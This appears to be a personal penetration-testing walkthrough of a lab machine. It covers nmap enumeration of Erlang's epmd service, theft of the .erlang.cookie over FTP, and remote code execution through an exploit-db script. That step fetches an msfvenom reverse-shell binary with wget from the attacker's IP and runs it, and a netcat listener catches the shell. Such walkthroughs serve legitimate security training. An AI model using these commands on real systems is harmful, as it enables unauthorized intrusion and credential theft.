5 :4369 epmd
Using https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd
$ nmap -sV -Pn -n -T4 -p 4369 --script epmd-info $ip
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-02 20:03 PDT
Nmap scan report for 192.168.197.68
Host is up (0.074s latency).
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
|_ rabbit: 65000
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds
# so this tells us there's a rabbitmq node running on 65000, which nmap was unable to identify
https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
# erlang cookie RCE
Using ftp, we can get it
# path: /var/lib/rabbitmq/
ftp> ls -la
227 Entering Passive Mode (192,168,197,68,156,64).
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 May 08 2020 .
drwxr-xr-x 25 ftp ftp 4096 Apr 24 2020 ..
-r-------- 1 ftp ftp 20 Apr 24 2020 .erlang.cookie
drwxr-x--- 6 ftp ftp 4096 Mar 10 20:43 mnesia
226 Directory send OK.
$ cat .erlang.cookie
JPCGJCAEWHPKKPBXBYYB
# more docs on how to RCE using erl and .erlang.cookie
https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
# . at end of every makes it execute
# -sname shortname (no domain needed)
# preffered: -name user@domain
$ erl -cookie JPCGJCAEWHPKKPBXBYYB -name kashz@kali
Erlang/OTP 24 [erts-12.0.3] [source] [64-bit] [smp:8:8] [ds:8:8:10] [async-threads:1] [jit]
Eshell V12.0.3 (abort with ^G)
(kashz@kali)1> net_adm:names('192.168.197.68').
{ok,[{"rabbit",65000}]}
# success, rabbit node running on port 65000
# now to ping to confirm, cookie is valid
# pong = success | pang = failure
(kashz@kali)2> net_adm:ping('clyde@192.168.197.68').
pang
# exploit/multi/misc/erlang_cookie_rce
not working
# checking for automated exploit-db script
Using https://www.exploit-db.com/exploits/49418
# generate shell
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.197 LPORT=4369 -f elf -o kashz
# update
TARGET = "192.168.197.68"
PORT = 65000
COOKIE = "JPCGJCAEWHPKKPBXBYYB"
CMD = "wget 192.168.49.197/kashz -O /tmp/kashz && chmod 777 /tmp/kashz && /tmp/kashz"
$ python3 49418.py
Extracted challenge: 1605844421
Authentication successful
Sending cmd: 'wget 192.168.49.197/kashz -O /tmp/kashz && chmod 777 /tmp/kashz && /tmp/kashz'
b'\x00\x00\x00\x00'
$ nc -lvnp 4369
listening on [any] 4369 ...
connect to [192.168.49.197] from (UNKNOWN) [192.168.197.68] 35926
rabbitmq@clyde:/var/lib/rabbitmq$ whoami;id;hostname;uname -a
rabbitmq
uid=107(rabbitmq) gid=112(rabbitmq) groups=112(rabbitmq)
clyde
Linux clyde 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1+deb9u1 (2020-06-07) x86_64 GNU/Linux
Last updated